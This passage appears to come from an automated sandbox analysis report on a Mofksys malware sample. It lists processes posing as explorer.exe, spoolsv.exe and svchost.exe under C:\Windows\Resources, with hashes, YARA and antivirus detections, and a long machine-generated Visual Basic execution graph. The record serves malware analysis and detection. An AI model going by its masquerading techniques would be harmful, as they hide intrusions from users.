                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:c:\windows\resources\themes\explorer.exe
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:138466 bytes
                                                                                                                                                                                MD5 hash:DD8285E811872E2562A43A04A7B27672
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:Visual Basic
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000005.00000000.464382819.0000000000401000.00000080.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000005.00000002.700344270.0000000000402000.00000080.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\Themes\explorer.exe, Author: Joe Security
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                Target ID:6
                                                                                                                                                                                Start time:23:56:58
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Users\user\Desktop\sj9q8uwmax.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"c:\users\user\desktop\sj9q8uwmax.exe " --local-control
                                                                                                                                                                                Imagebase:0x3d0000
                                                                                                                                                                                File size:3848888 bytes
                                                                                                                                                                                MD5 hash:871EB4B8AEFAEA1113DD3F08B7CB535C
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                Target ID:8
                                                                                                                                                                                Start time:23:57:01
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Windows\Resources\spoolsv.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:c:\windows\resources\spoolsv.exe SE
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:138457 bytes
                                                                                                                                                                                MD5 hash:A97B2BA7591F981B8BBB1CE5E78C8D3A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:Visual Basic
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000008.00000002.515627841.0000000000402000.00000080.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000008.00000000.485612261.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\spoolsv.exe, Author: Joe Security
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                Target ID:9
                                                                                                                                                                                Start time:23:57:02
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Windows\Resources\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:c:\windows\resources\svchost.exe
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:138302 bytes
                                                                                                                                                                                MD5 hash:E2A51AD55E5850D878E994E774D44ED1
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:Visual Basic
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000009.00000002.700388006.0000000000402000.00000080.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000009.00000000.487856728.0000000000401000.00000080.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: C:\Windows\Resources\svchost.exe, Author: Joe Security
                                                                                                                                                                                Antivirus matches:
                                                                                                                                                                                • Detection: 100%, Avira
                                                                                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                Target ID:10
                                                                                                                                                                                Start time:23:57:04
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                                                                                                                                                                Imagebase:0x7ff78ca80000
                                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high

                                                                                                                                                                                Target ID:11
                                                                                                                                                                                Start time:23:57:10
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Windows\Resources\spoolsv.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:c:\windows\resources\spoolsv.exe PR
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:138457 bytes
                                                                                                                                                                                MD5 hash:A97B2BA7591F981B8BBB1CE5E78C8D3A
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:Visual Basic
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 0000000B.00000002.507320494.0000000000402000.00000080.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 0000000B.00000000.505285070.0000000000401000.00000080.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                Target ID:12
                                                                                                                                                                                Start time:23:57:22
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                                                                                                                                                                                Imagebase:0x7ff78ca80000
                                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high

                                                                                                                                                                                Target ID:13
                                                                                                                                                                                Start time:23:57:24
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Windows\Resources\Themes\explorer.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\windows\resources\themes\explorer.exe" RO
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:138466 bytes
                                                                                                                                                                                MD5 hash:DD8285E811872E2562A43A04A7B27672
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:Visual Basic
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 0000000D.00000000.534411467.0000000000401000.00000080.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 0000000D.00000002.536439832.0000000000402000.00000080.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                Target ID:16
                                                                                                                                                                                Start time:23:57:35
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Windows\Resources\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):true
                                                                                                                                                                                Commandline:"C:\windows\resources\svchost.exe" RO
                                                                                                                                                                                Imagebase:0x400000
                                                                                                                                                                                File size:138302 bytes
                                                                                                                                                                                MD5 hash:E2A51AD55E5850D878E994E774D44ED1
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:Visual Basic
                                                                                                                                                                                Yara matches:
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000010.00000002.563844103.0000000000402000.00000080.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                • Rule: JoeSecurity_Mofksys, Description: Yara detected Mofksys, Source: 00000010.00000000.557848995.0000000000401000.00000080.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                                                                                Reputation:low

                                                                                                                                                                                Target ID:18
                                                                                                                                                                                Start time:23:58:15
                                                                                                                                                                                Start date:16/07/2022
                                                                                                                                                                                Path:C:\Windows\System32\svchost.exe
                                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                                Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p
                                                                                                                                                                                Imagebase:0x7ff78ca80000
                                                                                                                                                                                File size:51288 bytes
                                                                                                                                                                                MD5 hash:32569E403279B3FD2EDB7EBD036273FA
                                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                                Reputation:high


                                                                                                                                                                                  Execution Graph

                                                                                                                                                                                  Execution Coverage:6.7%
                                                                                                                                                                                  Dynamic/Decrypted Code Coverage:1.1%
                                                                                                                                                                                  Signature Coverage:8.5%
                                                                                                                                                                                  Total number of Nodes:1667
                                                                                                                                                                                  Total number of Limit Nodes:45
4342 405768 4334->4342 4336 40f937 __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 4337 40f958 4336->4337 4337->4281 4337->4282 4339 405768 4338->4339 4340 40f9e7 __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 4339->4340 4341 40fa08 4340->4341 4341->4283 4341->4286 4343 405771 4342->4343 4350 40eb43 4344->4350 4345 40ede6 __vbaStrCopy 4347 40ee44 __vbaFreeStr 4345->4347 4346 40eb4f #631 __vbaStrMove #516 __vbaFreeStr __vbaFreeVar 4348 40ee69 __vbaErrorOverflow 4346->4348 4346->4350 4347->4307 4349 40ec68 #593 4349->4348 4349->4350 4350->4345 4350->4346 4350->4348 4350->4349 4351 40ee64 4350->4351 4352 40ecf9 17 API calls 4350->4352 4351->4348 4352->4348 4352->4350 5441 404850 5442 40d750 __vbaChkstk 5441->5442 5443 40d7a5 __vbaOnError 5442->5443 5444 40f9a0 4 API calls 5443->5444 5445 40d7cb 5444->5445 5446 40d7d6 #618 __vbaStrMove __vbaStrCmp __vbaFreeStr 5445->5446 5447 40e12a __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 5445->5447 5448 40d841 __vbaStrCat __vbaStrMove 5446->5448 5449 40d82a __vbaStrCopy 5446->5449 5451 40d864 __vbaInStr __vbaInStr 5448->5451 5449->5451 5452 40e11d #598 5451->5452 5453 40d8ad 5451->5453 5452->5447 5454 40d8cf 6 API calls 5453->5454 5456 40d8c9 __vbaSetSystemError 5453->5456 5455 404c70 5454->5455 5457 40d93d __vbaSetSystemError __vbaRecAnsiToUni __vbaFreeStrList 5455->5457 5456->5454 5457->5452 5458 40d99c __vbaStrFixstr __vbaStrMove 5457->5458 5459 40ff70 14 API calls 5458->5459 5460 40d9c9 7 API calls 5459->5460 5461 40e1d1 __vbaErrorOverflow 5460->5461 5462 40da8b 7 API calls 5460->5462 5475 40e1e0 5461->5475 5463 40df09 6 API calls 5462->5463 5482 40daf3 5462->5482 5464 40df88 __vbaChkstk #689 __vbaStrMove __vbaStrCmp __vbaFreeStr 5463->5464 5465 40e09e #598 __vbaRecUniToAnsi 5463->5465 5464->5465 5467 40e028 5464->5467 5465->5482 5466 40f8f0 4 API calls 5466->5482 5468 40e04a #580 __vbaStrToAnsi 5467->5468 5472 40e044 __vbaSetSystemError 5467->5472 5474 40e07b __vbaSetSystemError __vbaStrToUnicode 
__vbaFreeStr 5467->5474 5468->5467 5469 40e0d5 __vbaSetSystemError __vbaRecAnsiToUni 5469->5458 5471 40e107 5469->5471 5470 4123c0 47 API calls 5473 40db1e __vbaStrMove __vbaStrCopy #616 __vbaStrMove 5470->5473 5477 40e117 __vbaSetSystemError 5471->5477 5472->5468 5476 40ee70 24 API calls 5473->5476 5474->5465 5478 40db68 __vbaStrMove __vbaStrCmp __vbaFreeStrList 5476->5478 5477->5452 5479 40dbbb __vbaStrCopy 5478->5479 5478->5482 5480 40ee70 24 API calls 5479->5480 5481 40dbe3 __vbaStrMove __vbaStrCmp __vbaFreeStrList 5480->5481 5481->5482 5483 40dc2f __vbaStrCat __vbaStrMove 5481->5483 5482->5465 5482->5466 5482->5469 5482->5470 5485 4128b0 65 API calls 5482->5485 5488 411d10 1112 API calls 5482->5488 5484 40fba0 30 API calls 5483->5484 5486 40dc5f __vbaFreeStr __vbaStrCat __vbaStrMove 5484->5486 5485->5482 5487 415660 145 API calls 5486->5487 5489 40dc9b __vbaFreeStr 5487->5489 5488->5482 5489->5482 5490 40dcbd __vbaStrCat __vbaStrMove #580 __vbaFreeStr #598 5489->5490 5491 40fba0 30 API calls 5490->5491 5492 40dd14 5491->5492 5493 40dd24 __vbaNew2 5492->5493 5494 40dd63 __vbaObjSet __vbaObjSet 5492->5494 5493->5492 5495 412c10 452 API calls 5494->5495 5496 40ddb4 __vbaFreeObjList #598 __vbaStrCat __vbaStrMove 5495->5496 5497 415d30 404 API calls 5496->5497 5498 40de0a __vbaFreeStr #598 __vbaStrCat __vbaStrMove 5497->5498 5499 4111a0 122 API calls 5498->5499 5500 40de51 __vbaFreeStr 5499->5500 5500->5482 5501 40de6f #598 5500->5501 5502 40fba0 30 API calls 5501->5502 5503 40de8c __vbaStrCat __vbaStrMove __vbaNameFile __vbaFreeStr #580 5502->5503 5503->5482 5504 408c50 5505 40ee70 24 API calls 5504->5505 5506 408c55 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5505->5506 5507 40ee70 24 API calls 5506->5507 5508 408c9e __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5507->5508 5509 40ee70 24 API calls 5508->5509 5510 408ce7 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5509->5510 5511 40ee70 24 API calls 5510->5511 5512 408d30 
__vbaStrMove __vbaStrCopy __vbaFreeStrList 5511->5512 5513 408d91 5512->5513 5514 408da2 18 API calls 5513->5514 5515 4091be __vbaStrCmp 5513->5515 5516 410180 65 API calls 5514->5516 5517 4091e0 5515->5517 5518 40948c __vbaStrCmp 5515->5518 5519 408e8c 19 API calls 5516->5519 5522 4125a0 60 API calls 5517->5522 5520 409b34 __vbaStrCopy 5518->5520 5521 4094ae 5518->5521 5523 410180 65 API calls 5519->5523 5525 40ee70 24 API calls 5520->5525 5524 4125a0 60 API calls 5521->5524 5526 409203 5522->5526 5527 408fa5 7 API calls 5523->5527 5528 4094c1 5524->5528 5529 409b52 __vbaStrMove __vbaStrCopy 5525->5529 5530 40924b __vbaStrCat #600 __vbaFreeVar 5526->5530 5536 40fba0 30 API calls 5526->5536 5533 410180 65 API calls 5527->5533 5534 409509 __vbaStrCat #600 __vbaFreeVar __vbaNew __vbaObjSet 5528->5534 5540 40fba0 30 API calls 5528->5540 5535 40ee70 24 API calls 5529->5535 5531 409298 5530->5531 5532 4092aa __vbaStrCopy 5530->5532 5544 4092a4 __vbaSetSystemError 5531->5544 5539 40ee70 24 API calls 5532->5539 5538 40902e 25 API calls 5533->5538 5542 409573 5534->5542 5541 409b74 13 API calls 5535->5541 5537 40921c 5536->5537 5543 415660 145 API calls 5537->5543 5545 410180 65 API calls 5538->5545 5546 4092c8 __vbaStrMove __vbaStrCopy __vbaFreeStrList 5539->5546 5547 4094da 5540->5547 5548 411590 145 API calls 5541->5548 5550 409584 __vbaHresultCheckObj 5542->5550 5551 4095a7 5542->5551 5552 409235 #580 5543->5552 5544->5532 5553 409177 __vbaFreeStrList 5545->5553 5558 409309 __vbaObjSet 5546->5558 5554 415660 145 API calls 5547->5554 5549 409c6c __vbaFreeStrList 5548->5549 5555 409c99 __vbaEnd 5549->5555 5556 409cab 5549->5556 5557 4095b1 __vbaFreeObj 5550->5557 5551->5557 5552->5530 5559 4094f3 #580 5554->5559 5560 409dec __vbaStrCopy 5555->5560 5561 4125a0 60 API calls 5556->5561 5564 4095d0 __vbaStrCopy 5557->5564 5565 40932e 5558->5565 5559->5534 5562 40ee70 24 API calls 5560->5562 5563 409cbe 5561->5563 5566 409e0a __vbaStrMove __vbaStrCopy 5562->5566 5563->5560 
5567 409cca #535 5563->5567 5568 410fb0 18 API calls 5564->5568 5569 409362 5565->5569 5570 40933f __vbaHresultCheckObj 5565->5570 5572 40ee70 24 API calls 5566->5572 5573 40aba7 5567->5573 5574 409cea 8 API calls 5567->5574 5575 4095ee __vbaStrMove 5568->5575 5571 40936c 7 API calls 5569->5571 5570->5571 5576 410780 47 API calls 5571->5576 5577 409e2c 7 API calls 5572->5577 5573->5573 5578 410180 65 API calls 5574->5578 5579 40ee70 24 API calls 5575->5579 5580 4093d0 __vbaFreeStrList 5576->5580 5581 409ee9 __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 5577->5581 5582 409d5a __vbaFreeStrList 5578->5582 5583 409603 __vbaStrMove __vbaInStr __vbaFreeStrList 5579->5583 5584 409405 8 API calls 5580->5584 5585 409487 5580->5585 5586 418c90 20 API calls 5581->5586 5587 40fba0 30 API calls 5582->5587 5588 4097e2 __vbaStrCopy 5583->5588 5589 40964c __vbaStrCopy 5583->5589 5584->5585 5585->5581 5591 409f3c __vbaFreeStrList __vbaStrCat __vbaStrMove __vbaStrCat __vbaStrMove 5586->5591 5592 409d86 #598 5587->5592 5590 410fb0 18 API calls 5588->5590 5593 40ee70 24 API calls 5589->5593 5594 409800 __vbaStrMove 5590->5594 5595 418c90 20 API calls 5591->5595 5596 415660 145 API calls 5592->5596 5597 40966a __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5593->5597 5598 40ee70 24 API calls 5594->5598 5599 409fa2 __vbaFreeStrList 5595->5599 5600 409dac 5596->5600 5601 40ee70 24 API calls 5597->5601 5602 409815 __vbaStrMove __vbaInStr __vbaFreeStrList 5598->5602 5603 418a10 15 API calls 5599->5603 5604 409db3 5600->5604 5605 409db5 #535 __vbaFpR4 5600->5605 5606 4096b3 15 API calls 5601->5606 5607 409aad __vbaObjSet 5602->5607 5608 40985e 5602->5608 5609 409fd4 5603->5609 5610 409dd6 #580 5604->5610 5605->5574 5605->5610 5606->5607 5617 409ae8 5607->5617 5611 40986e __vbaNew2 5608->5611 5614 40988a 5608->5614 5612 418a10 15 API calls 5609->5612 5610->5560 5611->5614 5615 409ff2 __vbaStrCopy 5612->5615 5622 4098c9 __vbaHresultCheckObj 5614->5622 5623 4098ec 5614->5623 5616 
40ee70 24 API calls 5615->5616 5618 40a010 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5616->5618 5620 409af9 __vbaHresultCheckObj 5617->5620 5621 409b1c 5617->5621 5619 40ee70 24 API calls 5618->5619 5624 40a059 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5619->5624 5625 409b26 __vbaFreeObj 5620->5625 5621->5625 5622->5623 5629 409926 __vbaHresultCheckObj 5623->5629 5630 409949 5623->5630 5626 40ee70 24 API calls 5624->5626 5625->5581 5627 40a0a2 __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5626->5627 5628 40ee70 24 API calls 5627->5628 5632 40a0eb __vbaStrMove __vbaStrCopy __vbaFreeStrList __vbaStrCopy 5628->5632 5631 409953 20 API calls 5629->5631 5630->5631 5631->5607 5633 40ee70 24 API calls 5632->5633 5634 40a13b 6 API calls 5633->5634 5635 40ee70 24 API calls 5634->5635 5636 40a1a1 6 API calls 5635->5636 5637 40ee70 24 API calls 5636->5637 5638 40a200 __vbaStrMove __vbaStrCopy __vbaFreeStrList 5637->5638 5639 40a261 5638->5639 5640 40a272 __vbaStrCat __vbaStrMove 5639->5640 5641 40aa5b 5639->5641 5642 40f8f0 4 API calls 5640->5642 5643 40f1d0 120 API calls 5641->5643 5644 40a2a0 __vbaFreeStr 5642->5644 5645 40aa6c 5643->5645 5646 40a329 __vbaStrCat __vbaStrMove 5644->5646 5647 40a2bb 7 API calls 5644->5647 5648 40aa7f __vbaObjSet 5645->5648 5696 40f1a0 __vbaStrCopy __vbaStrCopy 5645->5696 5649 40f8f0 4 API calls 5646->5649 5647->5646 5655 40aaba 5648->5655 5652 40a357 __vbaFreeStr 5649->5652 5653 40a3e0 __vbaStrCat __vbaStrMove 5652->5653 5654 40a372 7 API calls 5652->5654 5656 40f8f0 4 API calls 5653->5656 5654->5653 5657 40aacb __vbaHresultCheckObj 5655->5657 5658 40aaee 5655->5658 5659 40a40e __vbaFreeStr 5656->5659 5660 40aaf8 __vbaFreeObj 5657->5660 5658->5660 5661 40a497 __vbaStrCat __vbaStrMove 5659->5661 5662 40a429 7 API calls 5659->5662 5664 40ab6f __vbaFreeStr __vbaFreeStr 5660->5664 5663 40f8f0 4 API calls 5661->5663 5662->5661 5665 40a4c5 __vbaFreeStr 5663->5665 5666 40a4e0 7 API calls 5665->5666 5667 40a54e 
__vbaStrCat __vbaStrMove 5665->5667 5666->5667 5668 40f8f0 4 API calls 5667->5668 5669 40a57c __vbaFreeStr 5668->5669 5670 40a605 __vbaStrCat __vbaStrMove 5669->5670 5671 40a597 7 API calls 5669->5671 5672 40f8f0 4 API calls 5670->5672 5671->5670 5673 40a633 __vbaFreeStr 5672->5673 5674 40a6bc __vbaStrCat __vbaStrMove 5673->5674 5675 40a64e 7 API calls 5673->5675 5676 40f8f0 4 API calls 5674->5676 5675->5674 5677 40a6ea __vbaFreeStr 5676->5677 5678 40a773 __vbaStrCat __vbaStrMove 5677->5678 5679 40a705 7 API calls 5677->5679 5680 40f8f0 4 API calls 5678->5680 5679->5678 5681 40a7a1 __vbaFreeStr 5680->5681 5682 40a82a __vbaStrCat __vbaStrMove 5681->5682 5683 40a7bc 7 API calls 5681->5683 5684 40f8f0 4 API calls 5682->5684 5683->5682 5685 40a858 __vbaFreeStr 5684->5685 5686 40a8e1 __vbaStrCat __vbaStrMove 5685->5686 5687 40a873 7 API calls 5685->5687 5688 40f8f0 4 API calls 5686->5688 5687->5686 5689 40a90f __vbaFreeStr 5688->5689 5690 40a998 __vbaStrCat __vbaStrMove 5689->5690 5691 40a92a 7 API calls 5689->5691 5692 40f8f0 4 API calls 5690->5692 5691->5690 5693 40a9c6 __vbaFreeStr 5692->5693 5694 40a9e1 7 API calls 5693->5694 5695 40aa4f 5693->5695 5694->5695 5696->5648 5697 40e250 5698 40e28a __vbaOnError 5697->5698 5699 40e2a8 5698->5699 5700 40e2c0 5699->5700 5701 40e2ae __vbaHresultCheckObj 5699->5701 5702 40e2d8 __vbaHresultCheckObj 5700->5702 5703 40e2ea __vbaFreeObj __vbaExitProc 5700->5703 5701->5700 5702->5703 5704 40e310 5703->5704 6013 40d4d4 6014 40d741 __vbaErrorOverflow 6013->6014 6017 40d4e5 6013->6017 6015 40d750 __vbaChkstk 6014->6015 6018 40d7a5 __vbaOnError 6015->6018 6016 40d6db 6016->6014 6017->6016 6023 40d567 6017->6023 6024 40d547 __vbaHresultCheckObj 6017->6024 6019 40f9a0 4 API calls 6018->6019 6020 40d7cb 6019->6020 6021 40d7d6 #618 __vbaStrMove __vbaStrCmp __vbaFreeStr 6020->6021 6022 40e12a __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr __vbaFreeStr 6020->6022 6025 40d841 __vbaStrCat __vbaStrMove 6021->6025 6026 40d82a __vbaStrCopy 
6021->6026 6027 40d571 __vbaChkstk 6023->6027 6024->6027 6029 40d864 __vbaInStr __vbaInStr 6025->6029 6026->6029 6032 40d5b9 6027->6032 6030 40e11d #598 6029->6030 6031 40d8ad 6029->6031 6030->6022 6033 40d8cf 6 API calls 6031->6033 6037 40d8c9 __vbaSetSystemError 6031->6037 6034 40d5ea __vbaObjSet 6032->6034 6035 40d5ca __vbaHresultCheckObj 6032->6035 6036 404c70 6033->6036 6042 40d646 6034->6042 6035->6034 6038 40d93d __vbaSetSystemError __vbaRecAnsiToUni __vbaFreeStrList 6036->6038 6037->6033 6038->6030 6039 40d99c __vbaStrFixstr __vbaStrMove 6038->6039 6041 40ff70 14 API calls 6039->6041 6043 40d9c9 7 API calls 6041->6043 6044 40d651 __vbaHresultCheckObj 6042->6044 6045 40d66e 6042->6045 6046 40e1d1 __vbaErrorOverflow 6043->6046 6047 40da8b 7 API calls 6043->6047 6048 40d678 __vbaChkstk __vbaLateIdCall __vbaFreeObjList __vbaFreeVar 6044->6048 6045->6048 6061 40e1e0 6046->6061 6049 40df09 6 API calls 6047->6049 6072 40daf3 6047->6072 6048->6014 6050 40df88 __vbaChkstk #689 __vbaStrMove __vbaStrCmp __vbaFreeStr 6049->6050 6051 40e09e #598 __vbaRecUniToAnsi 6049->6051 6050->6051 6053 40e028 6050->6053 6051->6072 6052 40f8f0 4 API calls 6052->6072 6054 40e04a #580 __vbaStrToAnsi 6053->6054 6058 40e044 __vbaSetSystemError 6053->6058 6060 40e07b __vbaSetSystemError __vbaStrToUnicode __vbaFreeStr 6053->6060 6054->6053 6055 40e0d5 __vbaSetSystemError __vbaRecAnsiToUni 6055->6039 6057 40e107 6055->6057 6056 4123c0 47 API calls 6059 40db1e __vbaStrMove __vbaStrCopy #616 __vbaStrMove 6056->6059 6063 40e117 __vbaSetSystemError 6057->6063 6058->6054 6062 40ee70 24 API calls 6059->6062 6060->6051 6064 40db68 __vbaStrMove __vbaStrCmp __vbaFreeStrList 6062->6064 6063->6030 6065 40dbbb __vbaStrCopy 6064->6065 6064->6072 6066 40ee70 24 API calls 6065->6066 6067 40dbe3 __vbaStrMove __vbaStrCmp __vbaFreeStrList 6066->6067 6068 40dc2f __vbaStrCat __vbaStrMove 6067->6068 6067->6072 6069 40fba0 30 API calls 6068->6069 6071 40dc5f __vbaFreeStr __vbaStrCat __vbaStrMove 6069->6071 6070 
4128b0 65 API calls 6070->6072 6073 415660 145 API calls 6071->6073 6072->6051 6072->6052 6072->6055 6072->6056 6072->6070 6074 411d10 1112 API calls 6072->6074 6075 40dc9b __vbaFreeStr 6073->6075 6074->6072 6075->6072 6076 40dcbd __vbaStrCat __vbaStrMove #580 __vbaFreeStr #598 6075->6076 6077 40fba0 30 API calls 6076->6077 6078 40dd14 6077->6078 6079 40dd24 __vbaNew2 6078->6079 6080 40dd63 __vbaObjSet __vbaObjSet 6078->6080 6079->6078 6081 412c10 452 API calls 6080->6081 6082 40ddb4 __vbaFreeObjList #598 __vbaStrCat __vbaStrMove 6081->6082 6083 415d30 404 API calls 6082->6083 6084 40de0a __vbaFreeStr #598 __vbaStrCat __vbaStrMove 6083->6084 6085 4111a0 122 API calls 6084->6085 6086 40de51 __vbaFreeStr 6085->6086 6086->6072 6087 40de6f #598 6086->6087 6088 40fba0 30 API calls 6087->6088 6089 40de8c __vbaStrCat __vbaStrMove __vbaNameFile __vbaFreeStr #580 6088->6089 6089->6072 5705 418954 5706 418957 __vbaExitProc 5705->5706 5707 40fb57 5708 40fb61 __vbaFreeStr 5707->5708 5709 40fb6a __vbaFreeVar 5707->5709 5708->5709 5710 417458 __vbaExitProc 5711 417470 6 API calls 5710->5711 5715 40e666 __vbaFreeStr 6093 4160e6 __vbaAryUnlock __vbaFreeStr 5716 40256a 5717 402576 5716->5717 5718 4024f7 5717->5718 5719 4025ca __vbaExceptHandler 5717->5719 5721 40e570 __vbaChkstk 5722 40e5c5 8 API calls 5721->5722 5723 40e670 __vbaFreeObj 5722->5723 5724 40cd70 __vbaOnError 5725 40cdcd __vbaObjSet 5724->5725 5726 40cde4 5725->5726 5727 40cdf9 5726->5727 5728 40cdea __vbaHresultCheckObj 5726->5728 5729 40cf61 __vbaErrorOverflow 5727->5729 5730 40ce07 __vbaFreeObj 5727->5730 5728->5727 5731 40cf70 __vbaChkstk 5729->5731 5737 40ce29 5730->5737 5734 40cfc5 __vbaOnError 5731->5734 5732 40cf0c __vbaExitProc 5733 40cf41 5732->5733 5736 40d001 __vbaObjSet 5734->5736 5735 40ce3f __vbaObjSet 5735->5737 5738 40d01f 5736->5738 5737->5729 5737->5732 5737->5735 5739 40ce60 __vbaHresultCheckObj 5737->5739 5740 40ce6f 6 API calls 5737->5740 5741 40d047 5738->5741 5742 40d02a __vbaHresultCheckObj 
